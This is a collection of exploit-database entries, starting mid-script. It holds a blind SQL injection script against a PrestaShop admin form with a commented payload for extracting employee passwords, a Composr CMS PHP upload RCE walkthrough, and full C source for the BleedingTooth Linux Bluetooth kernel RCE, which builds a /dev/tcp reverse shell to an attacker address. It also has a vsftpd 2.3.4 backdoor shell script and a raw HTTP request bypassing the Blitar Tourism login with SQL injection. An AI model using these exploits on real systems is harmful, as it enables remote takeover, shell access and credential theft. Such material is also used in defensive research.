"form[step1][features][0][value]": "4", "form[step1][features][0][custom_value][1]": '', "form[step1][features][1][feature]": "2", "form[step1][features][1][value]": "8", "form[step1][features][1][custom_value][1]": '', "form[step1][id_manufacturer]": "1", "show_variations": "0", "form[step6][reference]": "demo_1", "form[step1][qty_0_shortcut]": "0", "form[step1][price_shortcut]": "23.900000", "form[step1][price_ttc_shortcut]": "23.9", "form[step2][id_tax_rules_group]": "1", "form[step1][id_category_default]": "4", "form[step1][categories][tree][]": "2", "form[step1][categories][tree][]": "3", "form[step1][categories][tree][]": "4", "ignore": "4", "form[step1][new_category][name]": '', "form[step1][new_category][id_parent]": "2", "form[step3][qty_0]": "0", "form[step3][minimal_quantity]": "1", "form[step3][location]": "TEST", "form[step3][low_stock_threshold]": '', "form[step3][virtual_product][is_virtual_file]": "0", "form[step3][virtual_product][name]": '', "form[step3][virtual_product][nb_downloadable]": '', "form[step3][virtual_product][expiration_date]": '', "form[step3][virtual_product][nb_days]": "0", "form[step3][pack_stock_type]": "3", "form[step3][attributes]": '', "product_combination_bulk[quantity]": '', "product_combination_bulk[cost_price]": '', "product_combination_bulk[impact_on_weight]": '', "product_combination_bulk[impact_on_price_te]": '', "product_combination_bulk[impact_on_price_ti]": '', "product_combination_bulk[date_availability]": '', "product_combination_bulk[reference]": '', "product_combination_bulk[minimal_quantity]": '', "product_combination_bulk[low_stock_threshold]": '', "product_combination_bulk[_token]": "0Dj8tJ3zd6YfSNgyxRFe6CfNbuMac6mn8rm_Gd52-to", "form[step3][out_of_stock]": "2", "form[step3][available_now][1]": '', "form[step3][available_later][1]": '', "form[step3][available_date]": '', "form[step4][width]": "0", "form[step4][height]": "0", "form[step4][depth]": "0", "form[step4][weight]": "0", "form[step4][additional_delivery_times]": "1", "form[step4][delivery_in_stock][1]": '', "form[step4][delivery_out_stock][1]": '', "form[step4][additional_shipping_cost]": "0.000000", "form[step2][price]": "23.900000", "form[step2][price_ttc]": "23.9", "form[step2][unit_price]": "0.000000", "form[step2][unity]": '', "form[step2][ecotax]": "0.000000", "form[step2][id_tax_rules_group]": "1", "form[step2][wholesale_price]": "0.000000", "form[step2][specific_price][sp_id_shop]": "1", "form[step2][specific_price][sp_id_currency]": '', "form[step2][specific_price][sp_id_country]": '', "form[step2][specific_price][sp_id_group]": '', "form[step2][specific_price][sp_id_product_attribute]": '', "form[step2][specific_price][sp_from]": '', "form[step2][specific_price][sp_to]": '', "form[step2][specific_price][sp_from_quantity]": "1", "form[step2][specific_price][leave_bprice]": "1", "form[step2][specific_price][sp_reduction]": "0.000000", "form[step2][specific_price][sp_reduction_type]": "amount", "form[step2][specific_price][sp_reduction_tax]": "1", "form[step2][specificPricePriority_0]": "id_shop", "form[step2][specificPricePriority_1]": "id_currency", "form[step2][specificPricePriority_2]": "id_country", "form[step2][specificPricePriority_3]": "id_group", "form[step5][meta_title][1]": '', "form[step5][meta_description][1]": '', "form[step5][link_rewrite][1]": "hummingbird-printed-t-shirt", "form[step5][redirect_type]": "301-category", "form[step6][visibility]": "both", "form[step6][display_options][available_for_order]": "1", "form[step6][display_options][show_price]": "1", "form[step6][tags][1]": '', "form[step6][condition]": "new", "form[step6][isbn]": '', "form[step6][ean13]": '', "form[step6][upc]": '', "form[step6][attachment_product][name]": '', "form[step6][attachment_product][description]": '', "form[id_product]": "1", "form[_token]": "4KtBNSbjc--GLbsVr__-wqC5Qw2hQKDXh6zb8vWKBwA", "form[step1][active]": "1"} data["form[_token]"] = form_token data["form[step3][location]"] = sql_payload data["form[id_product]"] = product_id # print(sql_payload) r = s.post(url, headers=headers, data=data) if(productDetails_form_location(s,target,token,product_id,admin_path) == "1"): return j return None for i in range(1,41): payload = "0'|(ascii(substr(user(),%d,1)) regexp [CHAR])#" % i extracted_char = chr(sqli(s,token,form_token,payload,target,product_id,admin_path)) sys.stdout.write(extracted_char) sys.stdout.flush() print("\n(+) done!") #PAYLOAD TO EXTRACT PASSWORD: # payload: 0'|ascii((substr((select passwd from ps_employee),1,1)) regexp [CHAR]#)

# Exploit Title: Composr 10.0.36 - Remote Code Execution # Date: 04/06/2021 # Exploit Author: Orion Hridoy # Vendor Homepage: https://compo.sr/ # Software Link: https://compo.sr/download.htm # Version: 10.0.36 # Tested on: Windows/Linux # CVE : CVE-2021-30149 A RCE on Composr CMS has been discovered by BugsBD Private LTD. We have a galleries security issue which allows us to upload a PHP file. Whenever we upload an image from galleries, Composr allows us to upload only images. If we tried to upload a PHP file from galleries uploader it will say someone attempting hacking activities. But we have a security issue on the Upload In Bulk section. Whenever we check allowed extension in Upload in bulk function we can see PHP is completely prohibited. But whenever we tamper the request and change the extension we can see it will upload the PHP file without other or server side verification. This allows a user to upload malicious file even when they restricted it. Steps To Reproduce: 1. Go to upload galleries. 2. Upload a image and tamper the request and change the extension from .jpg to .php 3. It will say hacking attempts, check the allowed extension and you can see it's not accepting PHP extension. 4. Now go to upload in bulk option. 5. Upload a image with PHP codes and tamper the request. 6. Change extension from .jpg to .php 7. It will get uploaded with the blocked PHP extension.

# Exploit Title: Linux Kernel 5.4 - 'BleedingTooth' Bluetooth Zero-Click Remote Code Execution # Date: 06/04/2020 # Exploit Author: Google Security Research (Andy Nguyen) # Tested on: 5.4.0-48-generic #52-Ubuntu SMP Thu Sep 10 10:58:49 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux # CVE : CVE-2020-12351, CVE-2020-12352 /* * BleedingTooth: Linux Bluetooth Zero-Click Remote Code Execution * by Andy Nguyen (theflow@) * * This Proof-Of-Concept demonstrates the exploitation of * CVE-2020-12351 and CVE-2020-12352. * * Compile using: * $ gcc -o exploit exploit.c -lbluetooth * * and execute as: * $ sudo ./exploit target_mac source_ip source_port * * In another terminal, run: * $ nc -lvp 1337 * exec bash -i 2>&0 1>&0 * * If successful, a calc can be spawned with: * export XAUTHORITY=/run/user/1000/gdm/Xauthority * export DISPLAY=:0 * gnome-calculator * * This Proof-Of-Concept has been tested against a Dell XPS 15 running * Ubuntu 20.04.1 LTS with: * - 5.4.0-48-generic #52-Ubuntu SMP Thu Sep 10 10:58:49 UTC 2020 * x86_64 x86_64 x86_64 GNU/Linux * * The success rate of the exploit is estimated at 80%. */ #include <bluetooth/bluetooth.h> #include <bluetooth/hci.h> #include <bluetooth/hci_lib.h> #include <bluetooth/l2cap.h> #include <errno.h> #include <stdlib.h> #include <sys/socket.h> #include <sys/uio.h> #include <unistd.h> #define REMOTE_COMMAND "/bin/bash -c /bin/bash</dev/tcp/%s/%s" // Increase if the heap spray is not reliable. #define NUM_SPRAY_KMALLOC_1024 6 #define NUM_SPRAY_KMALLOC_128 6 // Increase if stuck at sending packets. #define HCI_SEND_ACL_DATA_WAIT_USEC 5000 #define KERNEL_TEXT_BASE 0xffffffff81000000 #define KERNEL_UBUNTU_5_4_0_48 1 #ifdef KERNEL_UBUNTU_5_4_0_48 #define PUSH_RSI_ADD_BYTE_PTR_RBX_41_BL_POP_RSP_POP_RBP_RET 0xffffffff81567f46 #define POP_RAX_RET 0xffffffff8103d0b1 #define POP_RDI_RET 0xffffffff8108efa0 #define JMP_RAX 0xffffffff8100005b #define RUN_CMD 0xffffffff810ce470 #define DO_TASK_DEAD 0xffffffff810dc260 #define KASLR_DEFEAT(kaslr_offset, kernel_addr) \ do { \ if ((kernel_addr & 0xfffff) == 0xf4d8e) \ kaslr_offset = kernel_addr - KERNEL_TEXT_BASE - 0xf4d8e; \ else \ kaslr_offset = kernel_addr - KERNEL_TEXT_BASE - 0xc001a4; \ } while (0) #else #error "No kernel version defined" #endif #define L2CAP_IDENT 0x41 #define SIGNALLING_CID 0x01 #define AMP_MGR_CID 0x03 typedef struct { uint8_t code; uint8_t ident; uint16_t len; } __attribute__((packed)) a2mp_hdr; #define A2MP_HDR_SIZE 4 #define A2MP_COMMAND_REJ 0x01 typedef struct { uint16_t reason; } __attribute__((packed)) a2mp_command_rej; #define A2MP_INFO_REQ 0x06 typedef struct { uint8_t id; } __attribute__((packed)) a2mp_info_req; #define A2MP_INFO_RSP 0x07 typedef struct { uint8_t id; uint8_t status; uint32_t total_bw; uint32_t max_bw; uint32_t min_latency; uint16_t pal_caps; uint16_t assoc_size; } __attribute__((packed)) a2mp_info_rsp; #define A2MP_ASSOC_REQ 0x08 typedef struct { uint8_t id; } __attribute__((packed)) a2mp_assoc_req; #define A2MP_ASSOC_RSP 0x09 typedef struct { uint8_t id; uint8_t status; uint8_t assoc_data[0]; } __attribute__((packed)) a2mp_assoc_rsp; typedef struct { uint8_t mode; uint8_t txwin_size; uint8_t max_transmit; uint16_t retrans_timeout; uint16_t monitor_timeout; uint16_t max_pdu_size; } __attribute__((packed)) l2cap_conf_rfc; static char remote_command[64]; static int hci_sock = 0, l2_sock = 0; static uint16_t hci_handle = 0; static uint64_t kaslr_offset = 0, l2cap_chan_addr = 0; static uint16_t crc16_tab[] = { 0x0000, 0xC0C1, 0xC181, 0x0140, 0xC301, 0x03C0, 0x0280, 0xC241, 0xC601, 0x06C0, 0x0780, 0xC741, 0x0500, 0xC5C1, 0xC481, 0x0440, 0xCC01, 0x0CC0, 0x0D80, 0xCD41, 0x0F00, 0xCFC1, 0xCE81, 0x0E40, 0x0A00, 0xCAC1, 0xCB81, 0x0B40, 0xC901, 0x09C0, 0x0880, 0xC841, 0xD801, 0x18C0, 0x1980, 0xD941, 0x1B00, 0xDBC1, 0xDA81, 0x1A40, 0x1E00, 0xDEC1, 0xDF81, 0x1F40, 0xDD01, 0x1DC0, 0x1C80, 0xDC41, 0x1400, 0xD4C1, 0xD581, 0x1540, 0xD701, 0x17C0, 0x1680, 0xD641, 0xD201, 0x12C0, 0x1380, 0xD341, 0x1100, 0xD1C1, 0xD081, 0x1040, 0xF001, 0x30C0, 0x3180, 0xF141, 0x3300, 0xF3C1, 0xF281, 0x3240, 0x3600, 0xF6C1, 0xF781, 0x3740, 0xF501, 0x35C0, 0x3480, 0xF441, 0x3C00, 0xFCC1, 0xFD81, 0x3D40, 0xFF01, 0x3FC0, 0x3E80, 0xFE41, 0xFA01, 0x3AC0, 0x3B80, 0xFB41, 0x3900, 0xF9C1, 0xF881, 0x3840, 0x2800, 0xE8C1, 0xE981, 0x2940, 0xEB01, 0x2BC0, 0x2A80, 0xEA41, 0xEE01, 0x2EC0, 0x2F80, 0xEF41, 0x2D00, 0xEDC1, 0xEC81, 0x2C40, 0xE401, 0x24C0, 0x2580, 0xE541, 0x2700, 0xE7C1, 0xE681, 0x2640, 0x2200, 0xE2C1, 0xE381, 0x2340, 0xE101, 0x21C0, 0x2080, 0xE041, 0xA001, 0x60C0, 0x6180, 0xA141, 0x6300, 0xA3C1, 0xA281, 0x6240, 0x6600, 0xA6C1, 0xA781, 0x6740, 0xA501, 0x65C0, 0x6480, 0xA441, 0x6C00, 0xACC1, 0xAD81, 0x6D40, 0xAF01, 0x6FC0, 0x6E80, 0xAE41, 0xAA01, 0x6AC0, 0x6B80, 0xAB41, 0x6900, 0xA9C1, 0xA881, 0x6840, 0x7800, 0xB8C1, 0xB981, 0x7940, 0xBB01, 0x7BC0, 0x7A80, 0xBA41, 0xBE01, 0x7EC0, 0x7F80, 0xBF41, 0x7D00, 0xBDC1, 0xBC81, 0x7C40, 0xB401, 0x74C0, 0x7580, 0xB541, 0x7700, 0xB7C1, 0xB681, 0x7640, 0x7200, 0xB2C1, 0xB381, 0x7340, 0xB101, 0x71C0, 0x7080, 0xB041, 0x5000, 0x90C1, 0x9181, 0x5140, 0x9301, 0x53C0, 0x5280, 0x9241, 0x9601, 0x56C0, 0x5780, 0x9741, 0x5500, 0x95C1, 0x9481, 0x5440, 0x9C01, 0x5CC0, 0x5D80, 0x9D41, 0x5F00, 0x9FC1, 0x9E81, 0x5E40, 0x5A00, 0x9AC1, 0x9B81, 0x5B40, 0x9901, 0x59C0, 0x5880, 0x9841, 0x8801, 0x48C0, 0x4980, 0x8941, 0x4B00, 0x8BC1, 0x8A81, 0x4A40, 0x4E00, 0x8EC1, 0x8F81, 0x4F40, 0x8D01, 0x4DC0, 0x4C80, 0x8C41, 0x4400, 0x84C1, 0x8581, 0x4540, 0x8701, 0x47C0, 0x4680, 0x8641, 0x8201, 0x42C0, 0x4380, 0x8341, 0x4100, 0x81C1, 0x8081, 0x4040, }; static uint16_t crc16(uint16_t crc, const void *buf, size_t size) { const uint8_t *p = buf; while (size--) crc = crc16_tab[(crc ^ (*p++)) & 0xff] ^ (crc >> 8); return crc; } static int connect_l2cap(bdaddr_t dst_addr, uint16_t *handle) { int l2_sock; if ((l2_sock = socket(PF_BLUETOOTH, SOCK_RAW, BTPROTO_L2CAP)) < 0) { perror("[-] socket"); exit(1); } struct sockaddr_l2 laddr = {0}; laddr.l2_family = AF_BLUETOOTH; memcpy(&laddr.l2_bdaddr, BDADDR_ANY, sizeof(bdaddr_t)); if (bind(l2_sock, (struct sockaddr *)&laddr, sizeof(laddr)) < 0) { perror("[-] bind"); exit(1); } struct sockaddr_l2 raddr = {0}; raddr.l2_family = AF_BLUETOOTH; raddr.l2_bdaddr = dst_addr; if (connect(l2_sock, (struct sockaddr *)&raddr, sizeof(raddr)) < 0 && errno != EALREADY) { perror("[-] connect"); exit(1); } struct l2cap_conninfo conninfo = {0}; socklen_t len = sizeof(conninfo); if (getsockopt(l2_sock, SOL_L2CAP, L2CAP_CONNINFO, &conninfo, &len) < 0) { perror("[-] getsockopt"); exit(1); } if (handle) *handle = conninfo.hci_handle; return l2_sock; } static int connect_hci(void) { struct hci_dev_info di = {0}; int hci_device_id = hci_get_route(NULL); int hci_sock = hci_open_dev(hci_device_id); if (hci_devinfo(hci_device_id, &di) < 0) { perror("[-] hci_devinfo"); exit(1); } struct hci_filter flt = {0}; hci_filter_clear(&flt); hci_filter_all_ptypes(&flt); hci_filter_all_events(&flt); if (setsockopt(hci_sock, SOL_HCI, HCI_FILTER, &flt, sizeof(flt)) < 0) { perror("[-] setsockopt(HCI_FILTER)"); exit(1); } return hci_sock; } static void wait_event_complete_packet(void) { while (1) { uint8_t buf[256] = {0}; if (read(hci_sock, buf, sizeof(buf)) < 0) { perror("[-] read"); exit(1); } if (buf[0] == HCI_EVENT_PKT) { hci_event_hdr *hdr = (hci_event_hdr *)&buf[1]; if (btohs(hdr->evt) == EVT_NUM_COMP_PKTS) break; } } } static void hci_send_acl_data(int hci_sock, uint16_t hci_handle, void *data, uint16_t data_length, uint16_t flags) { uint8_t type = HCI_ACLDATA_PKT; hci_acl_hdr hdr = {0}; hdr.handle = htobs(acl_handle_pack(hci_handle, flags)); hdr.dlen = data_length; struct iovec iv[3] = {0}; iv[0].iov_base = &type; iv[0].iov_len = sizeof(type); iv[1].iov_base = &hdr; iv[1].iov_len = HCI_ACL_HDR_SIZE; iv[2].iov_base = data; iv[2].iov_len = data_length; if (writev(hci_sock, iv, sizeof(iv) / sizeof(struct iovec)) < 0) { perror("[-] writev"); exit(1); } usleep(HCI_SEND_ACL_DATA_WAIT_USEC); wait_event_complete_packet(); } static void disconnect_a2mp(void) { printf("[*] Disconnecting A2MP channel...\n"); struct { l2cap_hdr hdr; l2cap_cmd_hdr cmd_hdr; l2cap_disconn_req disconn_req; } disconn_req = {0}; disconn_req.hdr.len = htobs(sizeof(disconn_req) - L2CAP_HDR_SIZE); disconn_req.hdr.cid = htobs(SIGNALLING_CID); disconn_req.cmd_hdr.code = L2CAP_DISCONN_REQ; disconn_req.cmd_hdr.ident = L2CAP_IDENT; disconn_req.cmd_hdr.len = htobs(sizeof(disconn_req) - L2CAP_HDR_SIZE - L2CAP_CMD_HDR_SIZE); disconn_req.disconn_req.dcid = htobs(AMP_MGR_CID); disconn_req.disconn_req.scid = htobs(AMP_MGR_CID); hci_send_acl_data(hci_sock, hci_handle, &disconn_req, sizeof(disconn_req), 2); } static void connect_a2mp(void) { printf("[*] Connecting A2MP channel...\n"); struct { l2cap_hdr hdr; } a2mp_create = {0}; a2mp_create.hdr.len = htobs(sizeof(a2mp_create) - L2CAP_HDR_SIZE); a2mp_create.hdr.cid = htobs(AMP_MGR_CID); hci_send_acl_data(hci_sock, hci_handle, &a2mp_create, sizeof(a2mp_create), 2); // Configure to L2CAP_MODE_BASIC and max MTU. struct { l2cap_hdr hdr; l2cap_cmd_hdr cmd_hdr; l2cap_conf_rsp conf_rsp; l2cap_conf_opt conf_opt; l2cap_conf_rfc conf_rfc; l2cap_conf_opt conf_opt2; uint16_t conf_mtu; } conf_rsp = {0}; conf_rsp.hdr.len = htobs(sizeof(conf_rsp) - L2CAP_HDR_SIZE); conf_rsp.hdr.cid = htobs(SIGNALLING_CID); conf_rsp.cmd_hdr.code = L2CAP_CONF_RSP; conf_rsp.cmd_hdr.ident = L2CAP_IDENT; conf_rsp.cmd_hdr.len = htobs(sizeof(conf_rsp) - L2CAP_HDR_SIZE - L2CAP_CMD_HDR_SIZE); conf_rsp.conf_rsp.scid = htobs(AMP_MGR_CID); conf_rsp.conf_rsp.flags = htobs(0); conf_rsp.conf_rsp.result = htobs(L2CAP_CONF_UNACCEPT); conf_rsp.conf_opt.type = L2CAP_CONF_RFC; conf_rsp.conf_opt.len = sizeof(l2cap_conf_rfc); conf_rsp.conf_rfc.mode = L2CAP_MODE_BASIC; conf_rsp.conf_opt2.type = L2CAP_CONF_MTU; conf_rsp.conf_opt2.len = sizeof(uint16_t); conf_rsp.conf_mtu = htobs(0xffff); hci_send_acl_data(hci_sock, hci_handle, &conf_rsp, sizeof(conf_rsp), 2); } static void prepare_l2cap_chan_addr_leak(void) { printf("[*] Preparing to leak l2cap_chan address...\n"); struct { l2cap_hdr hdr; l2cap_cmd_hdr cmd_hdr; l2cap_conf_rsp conf_rsp; l2cap_conf_opt conf_opt; l2cap_conf_rfc conf_rfc; } conf_rsp = {0}; conf_rsp.hdr.len = htobs(sizeof(conf_rsp) - L2CAP_HDR_SIZE); conf_rsp.hdr.cid = htobs(SIGNALLING_CID); conf_rsp.cmd_hdr.code = L2CAP_CONF_RSP; conf_rsp.cmd_hdr.ident = L2CAP_IDENT; conf_rsp.cmd_hdr.len = htobs(sizeof(conf_rsp) - L2CAP_HDR_SIZE - L2CAP_CMD_HDR_SIZE); conf_rsp.conf_rsp.scid = htobs(AMP_MGR_CID); conf_rsp.conf_rsp.flags = htobs(0); conf_rsp.conf_rsp.result = htobs(L2CAP_CONF_UNACCEPT); conf_rsp.conf_opt.type = L2CAP_CONF_RFC; conf_rsp.conf_opt.len = sizeof(l2cap_conf_rfc); conf_rsp.conf_rfc.mode = L2CAP_MODE_ERTM; hci_send_acl_data(hci_sock, hci_handle, &conf_rsp, sizeof(conf_rsp), 2); } static uint64_t leak_kstack(void) { printf("[*] Leaking A2MP kernel stack memory...\n"); struct { l2cap_hdr hdr; a2mp_hdr amp_hdr; a2mp_info_req info_req; } info_req = {0}; info_req.hdr.len = htobs(sizeof(info_req) - L2CAP_HDR_SIZE); info_req.hdr.cid = htobs(AMP_MGR_CID); info_req.amp_hdr.code = A2MP_INFO_REQ; info_req.amp_hdr.ident = L2CAP_IDENT; info_req.amp_hdr.len = htobs(sizeof(info_req) - L2CAP_HDR_SIZE - sizeof(a2mp_hdr)); // Use a dummy id to make hci_dev_get() fail. info_req.info_req.id = 0x42; hci_send_acl_data(hci_sock, hci_handle, &info_req, sizeof(info_req), 2); while (1) { uint8_t buf[256] = {0}; if (read(hci_sock, buf, sizeof(buf)) < 0) { perror("[-] read"); exit(1); } if (buf[0] == HCI_ACLDATA_PKT) { l2cap_hdr *l2_hdr = (l2cap_hdr *)&buf[5]; if (btohs(l2_hdr->cid) == AMP_MGR_CID) { a2mp_hdr *amp_hdr = (a2mp_hdr *)&buf[9]; if (amp_hdr->code == A2MP_INFO_RSP) return *(uint64_t *)&buf[21]; } } } return 0; } static void trigger_type_confusion(void) { struct { l2cap_hdr hdr; uint16_t ctrl; a2mp_hdr amp_hdr; a2mp_command_rej cmd_rej; uint16_t fcs; } cmd_rej = {0}; cmd_rej.hdr.len = htobs(sizeof(cmd_rej) - L2CAP_HDR_SIZE); cmd_rej.hdr.cid = htobs(AMP_MGR_CID); cmd_rej.ctrl = 0xffff; cmd_rej.amp_hdr.code = A2MP_COMMAND_REJ; cmd_rej.amp_hdr.ident = L2CAP_IDENT; cmd_rej.amp_hdr.len = htobs(sizeof(cmd_rej) - L2CAP_HDR_SIZE - sizeof(a2mp_hdr) - sizeof(uint32_t)); cmd_rej.cmd_rej.reason = 0; cmd_rej.fcs = crc16(0, &cmd_rej, sizeof(cmd_rej) - sizeof(uint16_t)); hci_send_acl_data(hci_sock, hci_handle, &cmd_rej, sizeof(cmd_rej), 2); } static void build_krop(uint64_t *rop, uint64_t cmd_addr) { *rop++ = kaslr_offset + POP_RAX_RET; *rop++ = kaslr_offset + RUN_CMD; *rop++ = kaslr_offset + POP_RDI_RET; *rop++ = cmd_addr; *rop++ = kaslr_offset + JMP_RAX; *rop++ = kaslr_offset + POP_RAX_RET; *rop++ = kaslr_offset + DO_TASK_DEAD; *rop++ = kaslr_offset + JMP_RAX; } static void build_payload(uint8_t data[0x400]) { // Fake sk_filter object starting at offset 0x300. *(uint64_t *)&data[0x318] = l2cap_chan_addr + 0x320; // prog // Fake bpf_prog object starting at offset 0x320. // RBX points to the amp_mgr object. *(uint64_t *)&data[0x350] = kaslr_offset + PUSH_RSI_ADD_BYTE_PTR_RBX_41_BL_POP_RSP_POP_RBP_RET; // bpf_func *(uint64_t *)&data[0x358] = 0xDEADBEEF; // rbp // Build kernel ROP chain that executes run_cmd() from kernel/reboot.c. // Note that when executing the ROP chain, the data below in memory will be // overwritten. Therefore, the argument should be located after the ROP chain. build_krop((uint64_t *)&data[0x360], l2cap_chan_addr + 0x3c0); strncpy(&data[0x3c0], remote_command, 0x40); } static void spray_kmalloc_1024(int num) { // Skip first two hci devices because they may be legit. for (int i = 2; i < num + 2; i++) { printf("\r[*] Sending packet with id #%d...", i); fflush(stdout); struct { l2cap_hdr hdr; a2mp_hdr amp_hdr; a2mp_info_rsp info_rsp; } info_rsp = {0}; info_rsp.hdr.len = htobs(sizeof(info_rsp) - L2CAP_HDR_SIZE); info_rsp.hdr.cid = htobs(AMP_MGR_CID); info_rsp.amp_hdr.code = A2MP_INFO_RSP; info_rsp.amp_hdr.ident = L2CAP_IDENT; info_rsp.amp_hdr.len = htobs(sizeof(info_rsp) - L2CAP_HDR_SIZE - sizeof(a2mp_hdr)); info_rsp.info_rsp.id = i; hci_send_acl_data(hci_sock, hci_handle, &info_rsp, sizeof(info_rsp), 2); struct { l2cap_hdr hdr; a2mp_hdr amp_hdr; a2mp_assoc_rsp assoc_rsp; uint8_t data[0x400]; } assoc_rsp = {0}; assoc_rsp.hdr.len = htobs(sizeof(assoc_rsp) - L2CAP_HDR_SIZE); assoc_rsp.hdr.cid = htobs(AMP_MGR_CID); assoc_rsp.amp_hdr.code = A2MP_ASSOC_RSP; assoc_rsp.amp_hdr.ident = L2CAP_IDENT; assoc_rsp.amp_hdr.len = htobs(sizeof(assoc_rsp) - L2CAP_HDR_SIZE - sizeof(a2mp_hdr)); assoc_rsp.assoc_rsp.id = i; for (int j = 0; j < sizeof(assoc_rsp.data); j += 8) memset(&assoc_rsp.data[j], 'A' + j / 8, 8); build_payload(assoc_rsp.data); // Send fragmented l2cap packets (assume ACL MTU is at least 256 bytes). hci_send_acl_data(hci_sock, hci_handle, &assoc_rsp, sizeof(assoc_rsp) - sizeof(assoc_rsp.data), 2); hci_send_acl_data(hci_sock, hci_handle, &assoc_rsp.data[0x000], 0x100, 1); hci_send_acl_data(hci_sock, hci_handle, &assoc_rsp.data[0x100], 0x100, 1); hci_send_acl_data(hci_sock, hci_handle, &assoc_rsp.data[0x200], 0x100, 1); hci_send_acl_data(hci_sock, hci_handle, &assoc_rsp.data[0x300], 0x100, 1); } printf("\n"); } static void spray_kmalloc_128(int num) { // Skip first two hci devices because they may be legit. for (int i = 2; i < num + 2; i++) { printf("\r[*] Sending packet with id #%d...", i); fflush(stdout); struct { l2cap_hdr hdr; a2mp_hdr amp_hdr; a2mp_info_rsp info_rsp; } info_rsp = {0}; info_rsp.hdr.len = htobs(sizeof(info_rsp) - L2CAP_HDR_SIZE); info_rsp.hdr.cid = htobs(AMP_MGR_CID); info_rsp.amp_hdr.code = A2MP_INFO_RSP; info_rsp.amp_hdr.ident = L2CAP_IDENT; info_rsp.amp_hdr.len = htobs(sizeof(info_rsp) - L2CAP_HDR_SIZE - sizeof(a2mp_hdr)); info_rsp.info_rsp.id = i; hci_send_acl_data(hci_sock, hci_handle, &info_rsp, sizeof(info_rsp), 2); struct { l2cap_hdr hdr; a2mp_hdr amp_hdr; a2mp_assoc_rsp assoc_rsp; uint8_t data[0x80]; } assoc_rsp = {0}; assoc_rsp.hdr.len = htobs(sizeof(assoc_rsp) - L2CAP_HDR_SIZE); assoc_rsp.hdr.cid = htobs(AMP_MGR_CID); assoc_rsp.amp_hdr.code = A2MP_ASSOC_RSP; assoc_rsp.amp_hdr.ident = L2CAP_IDENT; assoc_rsp.amp_hdr.len = htobs(sizeof(assoc_rsp) - L2CAP_HDR_SIZE - sizeof(a2mp_hdr)); assoc_rsp.assoc_rsp.id = i; for (int j = 0; j < sizeof(assoc_rsp.data); j += 8) memset(&assoc_rsp.data[j], 'A' + j / 8, 8); // Fake sock object. *(uint64_t *)&assoc_rsp.data[0x10] = l2cap_chan_addr + 0x300; // sk_filter hci_send_acl_data(hci_sock, hci_handle, &assoc_rsp, sizeof(assoc_rsp), 2); } printf("\n"); } int main(int argc, char *argv[]) { if (argc != 4) { printf("Usage: %s target_mac source_ip source_port\n", argv[0]); exit(1); } bdaddr_t dst_addr = {0}; str2ba(argv[1], &dst_addr); snprintf(remote_command, sizeof(remote_command), REMOTE_COMMAND, argv[2], argv[3]); printf("[+] Remote command: %s\n", remote_command); printf("[*] Opening hci device...\n"); hci_sock = connect_hci(); printf("[*] Connecting to victim...\n"); l2_sock = connect_l2cap(dst_addr, &hci_handle); printf("[+] HCI handle: %x\n", hci_handle); connect_a2mp(); uint64_t kernel_addr = leak_kstack(); printf("[+] Kernel address: %lx\n", kernel_addr); KASLR_DEFEAT(kaslr_offset, kernel_addr); printf("[+] KASLR offset: %lx\n", kaslr_offset); if ((kaslr_offset & 0xfffff) != 0) { printf("[-] Error KASLR offset is invalid.\n"); exit(1); } prepare_l2cap_chan_addr_leak(); l2cap_chan_addr = leak_kstack() - 0x110; printf("[+] l2cap_chan address: %lx\n", l2cap_chan_addr); if ((l2cap_chan_addr & 0xff) != 0) { printf("[-] Error l2cap_chan address is invalid.\n"); exit(1); } // Somehow, spraying a bit before makes the UaF more reliable. printf("[*] Spraying kmalloc-1024...\n"); spray_kmalloc_1024(0x40); // Disconnect to free the l2cap_chan object, then reconnect. disconnect_a2mp(); connect_a2mp(); // Attempt to reclaim the freed l2cap_chan object. printf("[*] Spraying kmalloc-1024...\n"); for (int i = 0; i < NUM_SPRAY_KMALLOC_1024; i++) { spray_kmalloc_1024(0x40); } // Attempt to control the out-of-bounds read. printf("[*] Spraying kmalloc-128...\n"); for (int i = 0; i < NUM_SPRAY_KMALLOC_128; i++) { spray_kmalloc_128(0x40); } printf("[*] Triggering remote code execution...\n"); disconnect_a2mp(); trigger_type_confusion(); close(l2_sock); hci_close_dev(hci_sock); return 0; }

# Exploit Title: vsftpd 2.3.4 - Backdoor Command Execution # Date: 9-04-2021 # Exploit Author: HerculesRD # Software Link: http://www.linuxfromscratch.org/~thomasp/blfs-book-xsl/server/vsftpd.html # Version: vsftpd 2.3.4 # Tested on: debian # CVE : CVE-2011-2523 #!/usr/bin/python3 from telnetlib import Telnet import argparse from signal import signal, SIGINT from sys import exit def handler(signal_received, frame): # Handle any cleanup here print(' [+]Exiting...') exit(0) signal(SIGINT, handler) parser=argparse.ArgumentParser() parser.add_argument("host", help="input the address of the vulnerable host", type=str) args = parser.parse_args() host = args.host portFTP = 21 #if necessary edit this line user="USER nergal:)" password="PASS pass" tn=Telnet(host, portFTP) tn.read_until(b"(vsFTPd 2.3.4)") #if necessary, edit this line tn.write(user.encode('ascii') + b"\n") tn.read_until(b"password.") #if necessary, edit this line tn.write(password.encode('ascii') + b"\n") tn2=Telnet(host, 6200) print('Success, shell opened') print('Send `exit` to quit shell') tn2.interact()

# Exploit Title: Blitar Tourism 1.0 - Authentication Bypass SQLi # Date: 13 April 2021 # Exploit Author: sigeri94 # Vendor Homepage: https://sourcecodeaplikasi.info/source-code-aplikasi-biro-travel-berbasis-web/ # Software Link: https://codeload.github.com/satndy/Aplikasi-Biro-Travel/zip/master # Version: 1.0 POST /travel/Admin/ HTTP/1.1 Host: 192.168.186.132 Content-Length: 49 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://192.168.186.132 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://192.168.186.132/travel/Admin/ Accept-Encoding: gzip, deflate Accept-Language: id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7 Cookie: PHPSESSID=0nr18qfifjk2f5o4kimk5ca312 Connection: close username=admin%27+%23&password=admin&Login=Log+in

